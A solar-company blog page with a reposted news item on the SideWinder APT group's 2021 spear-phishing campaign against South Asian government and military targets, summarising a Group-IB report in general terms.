Kowatek Solar LTD
Themis Powder2Power particle-based CSP begins commissioning in France
18:00
Themis Powder2Power particle-based CSP begins commissioning in France
3 Hours Of Free Power Explained
17:53
3 Hours Of Free Power Explained
Father of Modern Solar Approaches the Next Frontier
17:51
Father of Modern Solar Approaches the Next Frontier
Hacked, leaked, and held for ransom: the worst breaches of 2026 so far
14:40
Hacked, leaked, and held for ransom: the worst breaches of 2026 so far
The optimal internal receiver geometry for high temperature solar fuels
17:59
The optimal internal receiver geometry for high temperature solar fuels
Rolls-Royce to build four BESS facilities for Sunly in Latvia
17:52
Rolls-Royce to build four BESS facilities for Sunly in Latvia
Engie to build 155MW solar PV at gas plant in Spain 
17:51
Engie to build 155MW solar PV at gas plant in Spain 
Supreme Court of Ohio reverses permit for Oak Run Solar site
14:28
Supreme Court of Ohio reverses permit for Oak Run Solar site
SolarPACES has now mapped all 43 of China’s new CSP projects
17:57
SolarPACES has now mapped all 43 of China’s new CSP projects
Germany: interaction between grid fees, BKZ and FCAs still need to be solved
07:34
Germany: interaction between grid fees, BKZ and FCAs still need to be solved

SideWinder APT Attacks Regional Targets in New Campaign

Security researchers have discovered dozens of new regional targets and new cyberattack tools associated with the Indian APT group SideWinder.

Suspected state-sponsored groups, also known as Rattlesnake, Hardcore Nationalist (HN2), and T-APT4, are highlighted in a new report from Group-IB. Old Snake, New Skin: Analysis of SideWinder APT Activity from June to November 2021.

Over the past six months, SideWinder threat actors have attempted to attack 61 government, military, law enforcement and other targets in Afghanistan, Bhutan, Myanmar, Nepal and Sri Lanka, the threat intelligence firm said. discovered.

We also linked this group to the 2020 attack against the Maldives government.

SideWinder’s threat vector of choice remained spear-phishing emails, which were launched against these targets during this period. According to Group-IB, two campaigns featured emails impersonating a cryptocurrency company from APT Group.

When victims click malicious links in phishing emails, they download malicious documents, LNK files, or malicious payloads. The LNK file downloads her HTA file and then the payload. The payload itself could be a reverse shell, remote access Trojan (RAT), or information stealer, the report claims.

Group-IB discovered two new homegrown tools used by SideWinder during the campaign. A RAT called SideWinder.RAT.b and an information stealer called SideWinder.StealerPy.

The latter is designed to collect Google Chrome browsing history, browser saved credentials, list of folders in directories, meta information and content like docx, pdf, txt files.

According to Group-IB, both custom tools use Telegram to communicate with compromised target machines rather than traditional C&C servers.

After analyzing the network infrastructure used by SideWinder, the vendor claimed it was probably the same entity as the BabyElephant APT group.

Group-IB Senior Malware Analyst Dmitry Kupin said:

As such, we found that several indications of compromise related to another APT group, Donot, were erroneously attributed to SideWinder. Nevertheless, we found additional evidence confirming that Patchwork (Hangover), Donot, and SideWinder sometimes borrow tools and malicious documents from each other and tailor them to their needs. ”

Group-IB was unable to determine how many SideWinder phishing attempts were successful.

Source link

Leave a Reply

Your email address will not be published. Required fields are marked *

Address:
 091, Peace Plaza, Asaba, Delta State.
216 DBS Road, Asaba, Delta State.
Start a conversation:

Follow Us Social Media

Facebook Twitter Youtube Instagram

All Rights Reserved. Kowatek Blog by IWUCHI

Home | About Us | Disclaimer | Privacy Policy | Contact Us